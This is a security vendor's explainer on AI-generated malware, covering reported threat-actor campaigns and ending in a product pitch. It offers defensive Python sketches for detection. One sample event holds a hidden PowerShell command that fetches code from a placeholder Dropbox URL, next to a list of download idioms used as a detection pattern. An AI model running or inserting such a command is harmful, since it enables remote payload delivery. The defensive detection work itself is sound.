What Is AI-Generated Malware?

AI-generated malware refers to malicious software leveraging artificial intelligence techniques. Unlike traditional malware, these AI-enabled programs can autonomously adapt and improve, making them harder to detect. By using machine learning algorithms, they evolve based on their surroundings and the security measures they encounter, presenting a dynamic threat landscape.

This type of malware can make decisions in real time, adjust its attack vectors, and even personalize its approach to increase its chances of success. Its ability to analyze data from its environment allows it to evade conventional security defenses, increasing both the complexity and scope of potential attacks. The continuous learning built into AI models makes AI-generated malware a formidable adversary in cybersecurity.

This is part of a series of articles about AI security.


Key Characteristics of AI Malware

AI-generated malware possesses several distinct characteristics that make it a challenge for cybersecurity professionals:

- Impersonation capabilities: One of the most concerning features of AI malware is its ability to mimic existing threat actors and known malware families with high accuracy. By training on open-source intelligence, such as detailed analyses of past malware campaigns, AI can generate malicious code that closely resembles recognized threats. This impersonation can mislead security teams, making it difficult to attribute attacks accurately and potentially planting false flags that disrupt defensive strategies.

- Polymorphism: AI malware often exhibits polymorphic traits, meaning it can automatically alter its code with each replication or infection. This continuous mutation makes it difficult for traditional signature-based detection methods to recognize and block the malware. The AI-generated variants may appear as countless different samples, overwhelming security tools and researchers with sheer volume, while still performing the same underlying malicious actions.

- Obfuscation techniques: To evade detection, AI-generated malware can utilize sophisticated obfuscation methods. These include encryption of its payload, insertion of dead code, and substitution of instructions within the codebase. Such techniques conceal the malware’s true functionality and hinder analysis, making it challenging for cybersecurity experts to understand and counteract the threat effectively.

- Real-time adaptation: AI-generated malware is capable of learning from its environment and adapting its behavior in real time. This dynamic adaptability allows it to modify its attack vectors based on the defenses it encounters, making it more resilient against standard protective measures. This characteristic also enables the malware to tailor its attacks to specific targets, increasing its chances of success.

- Preservation of malicious functionality: Despite constant changes in its code, AI-generated malware maintains its core malicious functions. Whether through encryption, code mutation, or other means, the malware ensures that its harmful activities—such as data theft, system compromise, or network infiltration—continue to be executed, even as its external appearance evolves.
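
The following harmless toy shows why exact-match signatures struggle against polymorphism. It is not real malware. It re-encodes the same placeholder bytes under three different single-byte XOR keys. Each variant gets a different SHA-256 hash, so a signature built from one variant misses the others, yet decoding recovers identical content. The XOR scheme, the keys, and the placeholder string are illustrative assumptions. Real polymorphic engines use far more elaborate transformations.

```python
import hashlib


def xor_encode(data: bytes, key: int) -> bytes:
    """Single-byte XOR: a toy stand-in for the re-encoding a polymorphic engine applies."""
    return bytes(b ^ key for b in data)


# Harmless placeholder bytes standing in for a program's unchanging core logic.
CORE = b"print('hello')"

# Three "variants" of the same core, each encoded under a different key.
variants = {key: xor_encode(CORE, key) for key in (0x11, 0x5A, 0xC3)}

# A naive signature database that only knows the hash of the first variant.
known_hashes = {hashlib.sha256(variants[0x11]).hexdigest()}

for key, blob in variants.items():
    matched = hashlib.sha256(blob).hexdigest() in known_hashes
    # XOR is its own inverse, so re-applying the key recovers the identical core.
    same_core = xor_encode(blob, key) == CORE
    print(f"key={key:#04x} signature_match={matched} same_core={same_core}")
```

Only the first variant matches the stored hash, yet all three decode to the same bytes. Behavior-based detection is meant to close exactly this gap.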

These characteristics make AI-generated malware a significant and growing threat in the cybersecurity landscape, as it combines adaptability, sophistication, and evasion in ways that challenge traditional defense mechanisms.

Common Types of AI-Crafted Malware Attacks

Adaptive Malware

Adaptive malware refers to malicious software that can alter its code, execution patterns, or communication methods in response to the environment it encounters during an attack. The goal is to evade detection and exploit new opportunities as they arise.

While adaptive malware existed before the advent of generative AI (GenAI), the incorporation of modern technologies like large language models (LLMs) has significantly enhanced its ability to avoid detection and increase effectiveness. AI allows adaptive malware to be more responsive, learning from its environment and modifying its behavior in real time to outmaneuver security measures.

Dynamic Malware Payloads

A malware payload is the component that carries out the malicious activity. Dynamic payloads can modify their actions or load additional malware during an attack, adapting to the conditions they encounter after deployment.

While dynamic payloads can be created without AI, the integration of AI capabilities enhances their responsiveness to the environment, making them more effective at evading detection and executing complex attacks. For instance, AI can enable a payload to change its behavior based on the type of defense mechanisms it faces, improving its chances of remaining undetected and succeeding.

Zero-Day and One-Day Attacks

Zero-day attacks target vulnerabilities that are unknown to the vendor, leaving the vendor “zero days” to patch the issue before exploitation begins. One-day attacks exploit vulnerabilities in the window between the release of a patch and its installation by users.

AI can accelerate both the discovery of these vulnerabilities and the development of exploits, enabling attackers to launch attacks more quickly. By reducing the time needed to identify and exploit vulnerabilities, GenAI can increase the effectiveness and frequency of zero-day and one-day attacks.
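
The one-day window is simple arithmetic. For each host, the exposure is the time between a patch's release and its installation, or today's date if the host is still unpatched. The sketch below uses hypothetical host names and dates. It measures the part of the race a defender controls. If AI shortens the time attackers need to weaponize a patch, every day in this window carries more risk.

```python
from datetime import date

# Hypothetical patch-release date for a publicly disclosed vulnerability.
PATCH_RELEASED = date(2024, 3, 1)
# Hypothetical "current" date used to measure still-open exposure.
TODAY = date(2024, 3, 31)

# Hypothetical per-host installation dates; None means the patch is not installed yet.
installed = {
    "host-a": date(2024, 3, 2),
    "host-b": date(2024, 3, 15),
    "host-c": None,
}


def exposure_days(patched_on, released, today):
    """Days a host stayed vulnerable after the fix became publicly available."""
    end = patched_on if patched_on is not None else today
    return (end - released).days


for host, patched_on in installed.items():
    print(host, exposure_days(patched_on, PATCH_RELEASED, TODAY))
```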

Content Obfuscation

Content obfuscation involves hiding or disguising the true intent of malicious code using techniques such as encryption, encoding, polymorphism, or metamorphism. These methods are designed to evade detection by security systems that rely on recognizing known patterns of malicious activity.

AI enhances the complexity and effectiveness of content obfuscation, making it more difficult for security measures to identify and neutralize threats. Additionally, AI can blend irrelevant code into malware, further masking its true nature and allowing it to bypass security filters.
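
Encryption and packing make content look statistically random. One common heuristic, weak on its own, is therefore byte entropy. The sketch computes Shannon entropy in bits per byte and flags buffers above an assumed threshold of 7.2. The threshold and the sample inputs are illustrative assumptions. Compressed media also scores high, so production scanners combine this signal with many others. Blending irrelevant, low-entropy code into a sample, as described above, is one way to drag the score down.

```python
import math
import os
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or uniform input, at most 8.0."""
    if not data:
        return 0.0
    counts = Counter(data)
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


# Assumed threshold; real tools tune this per file type and per region scanned.
HIGH_ENTROPY_THRESHOLD = 7.2


def looks_encrypted_or_packed(data: bytes) -> bool:
    return shannon_entropy(data) >= HIGH_ENTROPY_THRESHOLD


plain = b"The quick brown fox jumps over the lazy dog. " * 50
random_like = os.urandom(4096)  # stands in for an encrypted or compressed blob

print(round(shannon_entropy(plain), 2), looks_encrypted_or_packed(plain))
print(round(shannon_entropy(random_like), 2), looks_encrypted_or_packed(random_like))
```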

AI-Powered Botnets

AI-powered botnets are networks of compromised devices that leverage AI to optimize their operations. These botnets can modify their code to evade detection, propagate autonomously, select optimal targets, and adjust their attacks based on the security responses they encounter.

AI also enables these botnets to manage resources more effectively, ensuring load balancing and improving communication within the network. The result is more resilient and effective distributed denial-of-service (DDoS) attacks, spam campaigns, and other malicious activities. AI-powered botnets can also self-heal and enhance their obfuscation techniques, making them more challenging to disrupt.

Related content: Read our guide to AI security risks.

Tal Zamir, CTO, Perception Point

Tal Zamir is a 20-year software industry leader with a track record of solving urgent business challenges by reimagining how technology works.

TIPS FROM THE EXPERTS

- Implement deception technology: Use decoys and honeypots that mimic real assets to divert AI-driven malware. These decoys can be crafted to look like high-value targets, luring malware away from genuine systems. Advanced AI malware may “learn” from its environment, but well-designed deception can lead it to waste time and resources on fake targets while giving your team valuable detection insights.

- Utilize adversarial machine learning for malware detection: Apply adversarial ML techniques to anticipate how AI-generated malware tries to evade detection. By crafting adversarial examples that imitate those evasion tactics and training your defensive models on them, you can expose weaknesses in your detectors and close them before attackers exploit them.

- Integrate behavioral threat hunting with threat intelligence: Behavioral threat hunting should be augmented with up-to-the-minute threat intelligence on AI-driven attacks. By correlating behavioral anomalies with threat intelligence on known AI-driven techniques, teams can gain early indicators of potential AI malware activity. This combination of tactics can bridge gaps in detection, especially for new AI-generated malware strains.

- Implement AI-driven threat prediction models: Leverage predictive AI models that can analyze emerging trends in AI-generated malware and anticipate likely attack vectors or evasion tactics. These models can be trained on both internal and external threat data, providing your organization with early warnings of the types of tactics and vulnerabilities that might soon be targeted.
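
The deception tip rests on one property: decoys have no legitimate users, so any access to them is suspicious. Below is a minimal sketch of that check. The decoy names, the `AccessEvent` record, and the sample events are all hypothetical. In practice, the events would come from file-audit, authentication, and network logs.

```python
from dataclasses import dataclass

# Hypothetical decoy assets. No legitimate workflow uses them,
# so any access is a high-confidence signal.
DECOYS = {
    r"\\fileserver\finance\Q4_payroll_FINAL.xlsx",  # decoy file share path
    "svc_backup_admin",                             # decoy service account
    "10.20.30.250",                                 # decoy host (honeypot)
}


@dataclass
class AccessEvent:
    timestamp: str
    source_host: str
    target: str  # file path, account name, or IP address that was touched


def decoy_hits(events):
    """Yield every event that touches a decoy asset."""
    for event in events:
        if event.target in DECOYS:
            yield event


events = [
    AccessEvent("2024-05-01T09:14:02Z", "wks-017", r"\\fileserver\hr\handbook.pdf"),
    AccessEvent("2024-05-01T09:14:05Z", "wks-017", "svc_backup_admin"),
    AccessEvent("2024-05-01T09:15:40Z", "wks-017", "10.20.30.250"),
]

for hit in decoy_hits(events):
    print(f"ALERT decoy touched: {hit.target} from {hit.source_host} at {hit.timestamp}")
```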

Recent Examples of AI-Generated Malware Attacks

Forest Blizzard

Forest Blizzard, also known as Fancy Bear, is among the state-sponsored groups reported to have used AI tools in their operations. This group, linked to Russian state-sponsored hacking activities, has carried out highly targeted phishing campaigns across multiple continents, affecting at least nine countries.

These attacks are characterized by official government-themed lures that align with Russian geopolitical interests. The phishing emails, which may have been crafted with AI assistance, convincingly impersonate government documents, including both publicly available and internal files.

Once the phishing lures succeed, the attackers deploy custom backdoors like “Masepie” and “Oceanmap.” These tools establish persistence on victim machines, conduct reconnaissance, and exfiltrate sensitive data. The group is reported to exploit vulnerabilities quickly, often launching attacks within hours of landing on a victim’s machine, and AI tooling may contribute to that speed.

Learn more in our detailed guide to anti-phishing.

Emerald Sleet

Emerald Sleet, also known as Kimsuky or APT43, is a North Korea-linked threat group known for complex, multi-stage attack chains. It uses AI and legitimate cloud services to conduct cyber espionage and financial crimes, primarily targeting South Korean entities. Recent campaigns attributed to the group, such as “DEEP#GOSU,” used legitimate tools and services to evade detection.

In DEEP#GOSU, the group used an eight-stage attack chain, considerably longer than the attack chains seen in many other campaigns. This extended chain relies on LNK files, PowerShell scripts, and .NET assemblies. In the initial stages, a user opens a malicious LNK file attached to a phishing email. This triggers the download of PowerShell code from Dropbox, which then downloads additional scripts and installs a remote access trojan known as TutClient.

The use of Dropbox and Google services throughout the attack allows the malware to blend into normal network traffic. Each stage’s payload is encrypted with AES, which reduces the likelihood of detection by network or file scanning tools. The later stages of the attack focus on maintaining control over the compromised systems: scripts installed in these stages execute at random times to monitor user activity, including logging keystrokes.
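
When a user opens a malicious LNK that launches PowerShell, Windows Explorer typically appears as the parent process. The chain above then fetches code from Dropbox. A detection rule can key on that combination. The sketch below assumes a hypothetical `ProcessEvent` record with the fields an EDR or Sysmon pipeline usually exposes. The cloud-host and download-marker lists are illustrative assumptions, not a maintained indicator set. The sample URL is hypothetical.

```python
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Assumed indicators: cloud storage hosts and common PowerShell download idioms.
CLOUD_HOSTS = ("dropbox.com", "dropboxusercontent.com", "docs.google.com")
DOWNLOAD_MARKERS = ("downloadstring", "invoke-webrequest", "iwr ", "net.webclient")


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def is_suspicious(event: ProcessEvent) -> bool:
    """Flag PowerShell started by explorer.exe (for example, from a shortcut)
    whose command line downloads content from a cloud storage service."""
    cmd = event.command_line.lower()
    return (
        _basename(event.parent_image) == "explorer.exe"
        and _basename(event.image) in ("powershell.exe", "pwsh.exe")
        and any(host in cmd for host in CLOUD_HOSTS)
        and any(marker in cmd for marker in DOWNLOAD_MARKERS)
    )


sample = ProcessEvent(
    parent_image=r"C:\Windows\explorer.exe",
    image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    command_line="powershell -w hidden -c (New-Object Net.WebClient)"
    ".DownloadString('https://www.dropbox.com/s/example')",
)
print(is_suspicious(sample))
```

Requiring all four conditions keeps false positives low. The cost is that an attacker who changes any one element, such as the hosting service, slips past this particular rule.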

Crimson Sandstorm

Crimson Sandstorm, also known as Yellow Liderc or Tortoiseshell, is a state-sponsored threat actor associated with the Islamic Republic of Iran. This group has targeted Mediterranean organizations in the maritime, shipping, and logistics sectors through advanced watering-hole attacks.

In one reported campaign, Crimson Sandstorm compromised legitimate websites to deploy malicious JavaScript that fingerprints visitors by collecting information such as location, device type, and time of visit. If a visitor fits the group’s targeted profile, they are served a more advanced malware payload.

The primary malware used in these attacks is “IMAPLoader,” a .NET-based dynamic link library (DLL) that uses email for command-and-control (C2) communication. It relies on AppDomainManager injection, which helps it evade detection by traditional security tools when it loads on Windows systems.
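
IMAPLoader's command-and-control travels over email, so one defensive angle is to ask which processes speak IMAP at all. The sketch below flags connections to the standard IMAP ports (143, and 993 for IMAP over TLS) from processes outside an allowlist of mail clients. The allowlist, the `Connection` record, the process name `updater.exe`, and the sample addresses are assumptions. An attacker could also use non-standard ports, so treat this as one signal among several.

```python
from dataclasses import dataclass

IMAP_PORTS = {143, 993}  # standard IMAP and IMAP over TLS

# Assumed allowlist; each environment would maintain its own.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}


@dataclass
class Connection:
    process: str
    remote_ip: str
    remote_port: int


def unexpected_imap(connections):
    """Return IMAP-port connections made by processes that are not known mail clients."""
    return [
        c for c in connections
        if c.remote_port in IMAP_PORTS and c.process.lower() not in MAIL_CLIENTS
    ]


conns = [
    Connection("OUTLOOK.EXE", "203.0.113.10", 993),
    Connection("updater.exe", "198.51.100.7", 993),  # hypothetical non-mail process
    Connection("chrome.exe", "192.0.2.44", 443),
]
for c in unexpected_imap(conns):
    print(f"review: {c.process} -> {c.remote_ip}:{c.remote_port}")
```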

Detection and Protection Strategies Against AI-Generated Malware

Behavioral Analytics

Behavioral analytics focuses on understanding user and system behavior patterns to identify anomalies indicative of malware. By utilizing AI to monitor these interactions, these systems can differentiate between normal and suspicious activities. Real-time analysis helps organizations detect intrusions early, reducing the risk of damage from AI-powered threats.

These systems learn baseline behavior within networks, enabling accurate anomaly detection. The application of AI enhances this process, as it continually improves its understanding of typical versus atypical actions. Thus, behavioral analytics becomes a crucial tool in anticipating and mitigating the risk of sophisticated attacks tailored by AI.
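
The baseline idea can be shown with a simple statistical model in place of the learned models described above. Keep each entity's own history of daily activity, and flag values far above that entity's mean. The per-entity z-score, the threshold of 3, and the sample counts are assumptions for illustration. The same count of 505 file accesses is anomalous for one user and routine for a service account, which is the point of per-entity baselines.

```python
import statistics


def build_baseline(history):
    """history maps an entity (user or host) to a list of past daily activity counts."""
    return {
        entity: (statistics.mean(counts), statistics.pstdev(counts))
        for entity, counts in history.items()
    }


def is_anomalous(baseline, entity, today_count, z_threshold=3.0):
    """Flag counts more than z_threshold standard deviations above the entity's own mean."""
    mean, std = baseline[entity]
    if std == 0:
        return today_count > mean
    return (today_count - mean) / std > z_threshold


# Hypothetical files-accessed-per-day history for two entities.
history = {
    "alice": [40, 42, 38, 41, 39, 40, 44],
    "build-svc": [500, 510, 495, 505, 490, 500, 500],
}
baseline = build_baseline(history)

print(is_anomalous(baseline, "alice", 43))       # within alice's normal range
print(is_anomalous(baseline, "alice", 505))      # far outside it
print(is_anomalous(baseline, "build-svc", 505))  # normal for this service account
```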

Anomaly Detection Systems

Anomaly detection systems identify deviations from established patterns within network traffic or system processes. These systems employ AI to learn normal activity baselines and flag irregularities, such as unusual data flows or access requests, which may indicate malware presence. They provide critical, timely threat recognition and are vital in defending against AI-based attacks.

Because they continually update their model of normal network behavior, anomaly detection systems can flag novel threats that match no known signature, offering an adaptable defense layer against AI-generated malware. Catching these deviations early limits risk exposure and helps safeguard critical infrastructure.
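
One simple way to keep a baseline that updates dynamically is an exponentially weighted moving average (EWMA) of a metric and its variance. The sketch below is a simplified stand-in for the more sophisticated models described above. It scores each observation against the current baseline and then folds that observation in. The smoothing factor, the threshold, the warm-up length, and the sample traffic figures are assumptions.

```python
class EwmaDetector:
    """Tracks an exponentially weighted mean and variance of a metric and flags
    observations that fall far outside the current baseline."""

    def __init__(self, alpha=0.1, threshold=4.0, warmup=5):
        self.alpha = alpha          # weight of each new observation in the baseline
        self.threshold = threshold  # standard deviations that count as anomalous
        self.warmup = warmup        # observations to absorb before flagging anything
        self.mean = None
        self.var = 0.0
        self.count = 0

    def update(self, x: float) -> bool:
        """Score x against the current baseline, then fold it into the baseline."""
        self.count += 1
        if self.mean is None:
            self.mean = x
            return False
        deviation = x - self.mean
        std = self.var ** 0.5
        anomalous = (
            self.count > self.warmup
            and std > 0
            and abs(deviation) > self.threshold * std
        )
        # Incremental exponentially weighted updates for mean and variance.
        self.mean += self.alpha * deviation
        self.var = (1 - self.alpha) * (self.var + self.alpha * deviation ** 2)
        return anomalous


# Hypothetical outbound megabytes per minute from one host, with one spike.
detector = EwmaDetector()
traffic_mb = [10, 11, 9, 10, 12, 10, 11, 9, 10, 95, 10, 11]
flags = [detector.update(x) for x in traffic_mb]
print([i for i, flagged in enumerate(flags) if flagged])  # prints [9]
```

A large spike also inflates the tracked variance for a while, which temporarily makes the detector less sensitive. Production systems often mitigate this with robust statistics or by excluding flagged points from the update.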

Network Traffic Analysis

Network traffic analysis incorporates AI to scrutinize packet flows across networks for signs of malicious activity. By monitoring traffic in real time, it detects abnormalities that may suggest a network breach. AI-enhanced tools analyze large volumes of data, identifying subtle signs of infiltration or data exfiltration attempts that traditional methods might miss.

AI tools make traffic analysis more efficient by pinpointing attack patterns and predicting potential network vulnerabilities. Adaptive learning models improve detection as they evolve alongside emerging threats. This analytical approach is central to maintaining secure, resilient networks amid increasingly sophisticated AI-generated malware attacks.
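
Command-and-control beacons often check in at near-regular intervals, which makes them a concrete example of the subtle signs that traffic analysis looks for. The sketch groups connections by source and destination. It then flags pairs whose gaps have a low coefficient of variation (standard deviation divided by mean). The thresholds, the tuple format, and the sample flows are assumptions. Malware that adds heavy random jitter to its check-ins would evade this particular test, so the test is best used as one feature among many.

```python
import statistics
from collections import defaultdict


def beacon_candidates(events, max_cv=0.1, min_connections=6):
    """events: iterable of (timestamp_seconds, src, dst) tuples.
    Returns (pair, mean_gap, cv) for pairs whose connection gaps are suspiciously regular."""
    times = defaultdict(list)
    for ts, src, dst in events:
        times[(src, dst)].append(ts)

    flagged = []
    for pair, stamps in times.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean_gap
        if cv <= max_cv:
            flagged.append((pair, round(mean_gap, 1), round(cv, 3)))
    return flagged


# Hypothetical flows: one host checks in about every 60 s; another browses irregularly.
jitter = [0, 1, -1, 2, 0, -2, 1, 0]
beacon = [(60 * i + j, "10.0.0.5", "203.0.113.9") for i, j in enumerate(jitter)]
browsing = [(t, "10.0.0.8", "198.51.100.20") for t in [0, 4, 90, 95, 300, 310, 700, 1500]]

print(beacon_candidates(beacon + browsing))
```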

Automated Incident Response

Automated incident response systems integrate AI for rapid threat mitigation and system recovery. These systems autonomously assess, prioritize, and respond to incidents, executing pre-configured actions to contain and remediate threats. By leveraging AI, they shorten response times, which is crucial when dealing with AI-driven malware.

These systems continuously ingest threat intelligence and apply it to streamline remediation. Automation enables immediate analysis and containment, reducing both the need for human intervention and the delays it introduces. Through continual learning, the systems adjust their response strategies as malware threats evolve, so that defenses keep adapting to protect assets.
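
Pre-configured actions can be sketched as a playbook that maps severity levels to actions. Everything here is hypothetical: the severity levels, the action names, and the confidence gate are illustrative choices. In a real deployment, each action would call a specific EDR, firewall, or identity-provider API rather than append a string.

```python
from dataclasses import dataclass, field


@dataclass
class Incident:
    host: str
    severity: str      # "low", "medium", "high", or "critical"
    confidence: float  # detector confidence in [0, 1]
    actions_taken: list = field(default_factory=list)


# Hypothetical pre-configured playbook: containment steps run at each severity.
PLAYBOOK = {
    "low": ["open_ticket"],
    "medium": ["open_ticket", "collect_forensics"],
    "high": ["open_ticket", "collect_forensics", "isolate_host"],
    "critical": ["open_ticket", "collect_forensics", "isolate_host", "disable_user_sessions"],
}

# Disruptive steps run automatically only above this confidence; otherwise a human approves.
AUTO_CONTAIN_CONFIDENCE = 0.9
DISRUPTIVE = {"isolate_host", "disable_user_sessions"}


def respond(incident: Incident) -> Incident:
    """Apply the playbook for the incident's severity, gating disruptive steps on confidence."""
    for action in PLAYBOOK[incident.severity]:
        if action in DISRUPTIVE and incident.confidence < AUTO_CONTAIN_CONFIDENCE:
            incident.actions_taken.append(f"queue_for_approval:{action}")
        else:
            incident.actions_taken.append(action)
    return incident


print(respond(Incident("wks-017", "high", 0.95)).actions_taken)
print(respond(Incident("wks-022", "high", 0.60)).actions_taken)
```

The confidence gate is one way to balance speed against the cost of a false positive. Non-disruptive steps such as evidence collection run immediately, while host isolation waits for review when the detector is unsure.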

AI-Driven Email Security Solutions

AI-driven email security solutions use machine learning algorithms to detect suspicious email patterns and malicious content. These systems analyze email behavior, flagging anomalies and using pattern recognition to predict potential phishing attempts or malware. They are essential for stopping these threats at the initial access stage, making email communication safer.

AI models monitor and classify email traffic, adjusting to new tactics that cybercriminals employ. This adaptability allows for preemptive threat identification and blocks harmful emails before they reach users. Continuous learning mechanisms ensure that the latest threats are integrated into security protocols, maintaining resilience against evolving malware techniques.
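
ML-based email filters can combine many signals. One hand-built signal that is easy to show is lookalike-domain detection, which catches senders that swap a digit for a letter in a trusted domain or make a similar small change. The sketch uses Levenshtein edit distance against a hypothetical list of trusted domains, with an assumed cutoff of two edits. It illustrates a single feature, not how any particular product works.

```python
def levenshtein(a: str, b: str) -> int:
    """Dynamic-programming edit distance (insertions, deletions, substitutions)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            curr.append(min(
                prev[j] + 1,               # deletion
                curr[j - 1] + 1,           # insertion
                prev[j - 1] + (ca != cb),  # substitution (free if characters match)
            ))
        prev = curr
    return prev[-1]


# Hypothetical domains the organization and its partners legitimately use.
TRUSTED_DOMAINS = ["example.com", "examplebank.com"]


def lookalike_of(sender_domain: str, max_distance: int = 2):
    """Return the trusted domain that sender_domain imitates, or None.
    An exact match is legitimate; a near miss is suspicious."""
    domain = sender_domain.lower()
    for trusted in TRUSTED_DOMAINS:
        if 0 < levenshtein(domain, trusted) <= max_distance:
            return trusted
    return None


for sender in ["example.com", "examp1e.com", "exarnple.com", "unrelated.org"]:
    print(sender, "->", lookalike_of(sender))
```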

AI Malware Protection with Perception Point



Perception Point protects the modern workspace across email, browsers, and SaaS apps by uniquely combining an advanced AI-powered threat prevention solution with a managed incident response service. By fusing GenAI technology and human insight, Perception Point protects the productivity tools that matter the most to your business against any cyber threat, including malware.

Patented AI-powered detection technology, scale-agnostic dynamic scanning, and multi-layered architecture intercept all social engineering attempts, file & URL-based threats, malicious insiders, and data leaks. Perception Point’s platform is enhanced by cutting-edge LLMs to thwart known and emerging threats.

Reduce resource spend and time needed to secure your users’ email and workspace apps. Our all-included 24/7 Incident Response service, powered by autonomous AI and cybersecurity experts, manages our platform for you. No need to optimize detection, hunt for new threats, remediate incidents, or handle user requests. We do it for you — in record time.

Contact us today for a live demo.
